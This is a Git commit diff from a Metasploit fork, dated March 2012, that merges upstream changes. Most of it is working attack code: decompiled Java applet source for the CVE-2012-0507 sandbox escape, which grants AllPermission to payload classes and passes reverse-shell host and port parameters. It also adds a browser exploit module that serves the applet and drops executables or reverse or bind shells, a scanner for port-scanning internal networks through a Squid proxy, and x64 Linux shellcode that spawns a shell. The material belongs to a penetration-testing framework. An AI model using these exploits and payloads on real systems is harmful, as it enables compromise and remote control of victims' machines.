adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'upstream-master'

Browse Source
This commit is contained in:
James Lee
2012-03-29 13:18:01 -06:00
parent e48c47e958 f069a32223
commit b5fc8e4a77
10 changed files with 552 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/armitage/armitage.jar
BIN
View File
Binary file not shown.
data/armitage/whatsnew.txt
+5
View File
@@ -1,6 +1,11 @@
Armitage Changelog
==================
29 Mar 12
---------
- Fixed a bug that affects first-time users. Armitage was not initializing a
console before trying to connect to the database.
28 Mar 12
---------
- Team server now delivers chat messages in batches vs. one line at a time.
data/exploits/CVE-2012-0507.jar
BIN
View File
Binary file not shown.
external/source/exploits/CVE-2012-0507/Exploit.java
Vendored
+58
View File
@@ -0,0 +1,58 @@
package a;
import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.concurrent.atomic.AtomicReferenceArray;
import a.*;
// Referenced classes of package a:
// Help
public class Exploit extends Applet
{
public Exploit()
{
}
public static byte[] StringToBytes(String s)
{
byte abyte0[] = new byte[s.length() / 2];
for(int i = 0; i < s.length(); i += 2)
abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
return abyte0;
}
public void init()
{
try
{
String as[] = {
"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003"
};
StringBuilder stringbuilder = new StringBuilder();
for(int i = 0; i < as.length; i++)
stringbuilder.append(as[i]);
ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));
Object aobj[] = (Object[])(Object[])objectinputstream.readObject();
Help ahelp[] = (Help[])(Help[])aobj[0];
AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];
ClassLoader classloader = getClass().getClassLoader();
atomicreferencearray.set(0, classloader);
Help _tmp = ahelp[0];
String data = getParameter( "data" );
String jar = getParameter( "jar" );
String lhost = getParameter( "lhost" );
String lport = getParameter( "lport" );
System.out.println("go go go");
Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
}
catch(Exception exception) {
System.out.println(exception.getMessage());
}
}
}
external/source/exploits/CVE-2012-0507/Help.java
Vendored
+82
View File
@@ -0,0 +1,82 @@
package a;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.net.URL;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.lang.reflect.Field;
public class Help extends ClassLoader implements Serializable{
public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {
String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
Class cls = null;
try
{
for( int index=0 ; index<classNames.length ; index++ )
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = expl.getClass().getResourceAsStream( classPaths[index] );
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
URL url = new URL( "file:///" );
Certificate[] certs = new Certificate[0];
Permissions perm = new Permissions();
perm.add( new AllPermission() );
ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );
cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd );
Class class_cls = cls.getClass();
System.out.println("The type of the object is: " + class_cls.getName());
}
// cls will end up being the PayloadX class
if( cls != null )
{
// reflect into the PayloadX class to get these three fields
Field payload_data = cls.getField( "data" );
Field payload_jar = cls.getField( "jar" );
Field payload_lhost = cls.getField( "lhost" );
Field payload_lport = cls.getField( "lport" );
// instantiate the PayloadX object once so as we can set the native payload data
Object obj = cls.newInstance();
// set the native payload data, lhost and lport
payload_data.set( obj, data );
payload_jar.set( obj, jar );
payload_lhost.set( obj, lhost );
payload_lport.setInt( obj, lport );
// instantiate a second PayloadX object to perform the actual payload
obj = cls.newInstance();
}
}
catch( Exception e ) {
System.out.println(e.getMessage());
}
}
}
lib/msf/base/simple/payload.rb
+4
View File
@@ -74,6 +74,10 @@ module Payload
len = e.encoded.length
if arch.index(ARCH_JAVA) and fmt == 'war'
return e.encoded_war.pack
end
output = Msf::Util::EXE.to_executable_fmt(framework, arch, plat, e.encoded, fmt, exeopts)
if not output
lib/msf/core/payload.rb
+8 -2
View File
@@ -528,11 +528,17 @@ protected
end
# Assemble the payload from the assembly
sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encoded
cpu = case module_info['Arch']
when ARCH_X86 then Metasm::Ia32.new
when ARCH_X86_64 then Metasm::X86_64.new
when ARCH_PPC then Metasm::PowerPC.new
when ARCH_ARMLE then Metasm::ARM.new
end
sc = Metasm::Shellcode.assemble(cpu, asm).encoded
# Calculate the actual offsets now that it's been built
off.each_pair { |option, val|
off[option] = [ sc.offset_of_reloc(option), val[1] ]
off[option] = [ sc.offset_of_reloc(option) || val[0], val[1] ]
}
# Cache the payload blob
modules/auxiliary/scanner/http/squid_pivot_scanning.rb
+135
View File
@@ -0,0 +1,135 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex/socket/range_walker'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Squid Proxy Port Scanner',
'Description' => %q{
A misconfigured Squid proxy can allow an attacker to make requests on their behalf.
This may give the attacker information about devices that they cannot reach but the
Squid proxy can. For example, an attacker can make requests for internal IP addresses
against a misconfigurated open Squid proxy exposed to the Internet therefore performing
an internal port scan. The error messages returned by the proxy are used to determine
if the port is open or not. Many Squid proxies use custom error codes so your mileage
may vary. The open_proxy module can be used to test for open proxies though a Squid proxy
does not have to be open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows
the attack to pivot to another part of the network).
},
'Author' => ['willis'],
'Version' => '$Revision$',
'References' =>
[
'URL','http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls'
],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('RANGE', [true, "IPs to scan through Squid proxy", '']),
OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]),
OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]),
OptString.new('CANARY_IP',[true,"The IP to check if the proxy always answers positively; the IP should not respond.","1.2.3.4"])
], self.class)
end
def run_host(target_host)
begin
iplist = Rex::Socket::RangeWalker.new(datastore['RANGE'])
dead = false
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
vprint_status("[#{rhost}] Verifying manual testing is not required...")
manual = false
#request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
res_test = send_request_cgi({
'uri' => "http://{datastore['CANARY_IP']}:80",
'method' => 'GET',
'data' => '',
'version' => '1.0',
'vhost' => ''
}, 10)
if res_test and res_test.body and (res_test.code == 200)
print_error("#{rhost} likely answers positively to every request, check it manually.")
print_error("\t\t Proceeding with the scan may increase false positives.")
manual = true
end
iplist.each do |target|
next if manual and datastore['MANUAL_CHECK']
portlist.each do |port|
next if dead
vprint_status("[#{rhost}] Requesting #{target}:#{port}")
if port==443
res = send_request_cgi({
'uri' => "https://#{target}:#{port}",
'method' => 'GET',
'data' => '',
'version' => '1.0',
'vhost' => ''
}, 10)
else
res = send_request_cgi({
'uri' => "http://#{target}:#{port}",
'method' => 'GET',
'data' => '',
'version' => '1.0',
'vhost' => ''
}, 10)
end
if res and res.body
if res.code == 200 or res.body =~ /Zero/ or res.code == 404 or res.code == 401
print_good("[#{rhost}] #{target}:#{port} seems OPEN")
report_service(:host => target, :port => port, :name => "unknown", :info => res.body )
end
if res.body =~ /No route to host/
dead = true
print_error("[#{rhost}] #{target} is DEAD")
end
print_status("[#{rhost}] #{target}:#{port} blocked by ACL") if res.body =~ /Access control/
if res.body =~ /Connection refused/ or res.body =~ /service not listening/
report_host(:host => target)
print_good("[#{rhost}] #{target} is alive but #{port} is CLOSED")
end
end
end
dead = false
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
modules/exploits/multi/browser/java_atomicreferencearray.rb
+173
View File
@@ -0,0 +1,173 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',
'Description' => %q{
This module exploits a vulnerability due to the fact that
AtomicReferenceArray uses the Unsafe class to store a reference in an
array directly, which may violate type safety if not used properly.
This allows a way to escape the JRE sandbox, and load additional classes
in order to perform malicious operations.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r', # metasploit module
'juan vazquez' # metasploit module
],
'References' =>
[
['CVE', '2012-0507'],
['BID', '52161'],
['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']
],
'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2012'
))
end
def exploit
# load the static jar file
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )
fd = File.open( path, "rb" )
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri( cli, request )
data = nil
host = nil
port = nil
peer = "#{cli.peerhost}:#{cli.peerport}"
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect( cli, get_resource() + '/', '')
return
end
print_status("#{peer} - Sending #{self.name}")
payload = regenerate_payload( cli )
if not payload
print_error("#{peer} - Failed to generate the payload." )
return
end
if target.name == 'Generic (Java Payload)'
if datastore['LHOST']
jar = payload.encoded
host = datastore['LHOST']
port = datastore['LPORT']
vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )
else
port = datastore['LPORT']
datastore['RHOST'] = cli.peerhost
vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )
end
if jar
print_status( "Generated jar to drop (#{jar.length} bytes)." )
jar = Rex::Text.to_hex( jar, prefix="" )
else
print_error("#{peer} - Failed to generate the executable." )
return
end
else
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error("#{peer} - Failed to generate the executable." )
return
end
end
send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
return
end
print_status( "#{peer} - sending jar to ..." )
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
def generate_html( data, jar, host, port )
html = "<html><head></head>"
html += "<body>"
html += "<applet archive=\"Applet.jar\" code=\"a.Exploit.class\" width=\"1\" height=\"1\">"
html += "<param name=\"data\" value=\"#{data}\"/>" if data
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
html += "</applet></body></html>"
return html
end
def generate_jar()
return @jar_data
end
end
modules/payloads/singles/linux/x64/shell_find_port.rb
+87
View File
@@ -0,0 +1,87 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/find_port'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Find Port Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection',
'Author' => 'mak',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::FindPort,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'CPORT' => [ 32, 'n' ],
},
'Assembly' => <<EOS
xor rdi,rdi
xor rbx,rbx
mov bl,0x14
sub rsp,rbx
lea rdx,[rsp]
lea rsi,[rsp+4]
find_port:
push 0x34 ; getpeername
pop rax
syscall
inc rdi
cmp word [rsi+2],0x4142
jne find_port
dec rdi
push 2
pop rsi
dup2:
push 0x21 ; dup2
pop rax
syscall
dec rsi
jns dup2
mov rbx,rsi
mov ebx, 0x68732f41
mov eax,0x6e69622f
shr rbx,8
shl rbx,32
or rax,rbx
push rax
mov rdi,rsp
xor rsi,rsi
mov rdx,rsi
push 0x3b ; execve
pop rax
syscall
EOS
}
))
end
def size
return 91
end
end